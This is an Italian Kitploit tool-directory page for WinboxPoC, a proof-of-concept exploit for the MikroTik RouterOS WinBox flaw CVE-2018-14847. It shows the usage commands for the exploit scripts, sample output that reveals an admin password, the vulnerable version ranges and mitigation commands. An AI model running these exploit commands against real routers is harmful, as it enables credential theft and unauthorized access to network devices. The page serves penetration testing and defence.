Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
WinboxPoC — Prova di concetto della vulnerabilità critica di Winbox (CVE-2018-14847) | Kitploit
Strumenti/GitHubGitHub/basucert/winboxpoc
Attacchi alle PasswordAnalisi delle VulnerabilitàExploitRaccolta InformazioniSicurezza di RetePenetration TestingArchived
GitHubbasucert/winboxpoc

WinboxPoC

Prova di concetto della vulnerabilità critica di Winbox (CVE-2018-14847)

Vedi Repository
5204615 anni faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Sito web

WinboxExploit

Questa è una proof of concept della critica vulnerabilità WinBox (CVE-2018-14847) che consente la lettura arbitraria di file con password in chiaro.

La vulnerabilità è stata riparata da tempo, quindi questo progetto è terminato e non sarà più supportato o aggiornato. Puoi invece forkarlo e aggiornarlo tu stesso.

Post sul blog

https://n0p.me/winbox-bug-dissection/

Requisiti

  • Python 3+

Questo script NON funzionerà con Python 2.x o versioni inferiori.

Come Usare

Lo script si usa semplicemente con argomenti semplici dalla riga di comando.

WinBox (TCP/IP)

Sfrutta la vulnerabilità e legge la password.

root@kitploit:~
python3 WinboxExploit.py <IP-ADDRESS> [PORT]

Esempio:

root@kitploit:~
$ python3 WinboxExploit.py 172.17.17.17
Connected to 172.17.17.17:8291
Exploit successful
User: admin
Pass: Th3P4ssWord

MAC server WinBox (Livello 2)

Puoi estrarre file anche se il dispositivo non ha un indirizzo IP.

Semplice controllo di scoperta per dispositivi Mikrotik connessi localmente.

root@kitploit:~
python3 MACServerDiscover.py

Esempio:

root@kitploit:~
$ python3 MACServerDiscover.py
Looking for Mikrotik devices (MAC servers)

    aa:bb:cc:dd:ee:ff 

    aa:bb:cc:dd:ee:aa

Sfrutta la vulnerabilità e legge la password.

root@kitploit:~
python3 MACServerExploit.py <MAC-ADDRESS>

Esempio:

root@kitploit:~
$ python3 MACServerExploit.py aa:bb:cc:dd:ee:ff

User: admin
Pass: Th3P4ssWord

Versioni Vulnerabili

Tutte le versioni di RouterOS dal 2015-05-28 al 2018-04-20 sono vulnerabili a questo exploit.

Dispositivi Mikrotik con versioni RouterOS:

  • Longterm: 6.30.1 - 6.40.7
  • Stable: 6.29 - 6.42
  • Beta: 6.29rc1 - 6.43rc3

Per maggiori informazioni vedi: https://blog.mikrotik.com/security/winbox-vulnerability.html

Tecniche di Mitigazione

  • Aggiorna il router a una versione di RouterOS che includa la correzione.
  • Disabilita il servizio WinBox sul router.
  • Puoi limitare l'accesso al servizio WinBox a indirizzi IP specifici con il seguente comando:
root@kitploit:~
/ip service set winbox address=10.0.0.0/8,172.16.0.0/12,192.168.0.0/16
  • Puoi utilizzare alcune regole di filtro (ACL) per negare l'accesso esterno al servizio WinBox:
root@kitploit:~
/ip firewall filter add chain=input in-interface=wan protocol=tcp dst-port=8291 action=drop
  • Limitare l'accesso al servizio mac-winbox può essere fatto specificando le interfacce consentite:
root@kitploit:~
/tool mac-server mac-winbox

Copyright

  • Sponsorizzato dal CERTCC iraniano (https://certcc.ir). Tutti i diritti riservati.
Scarica lo strumento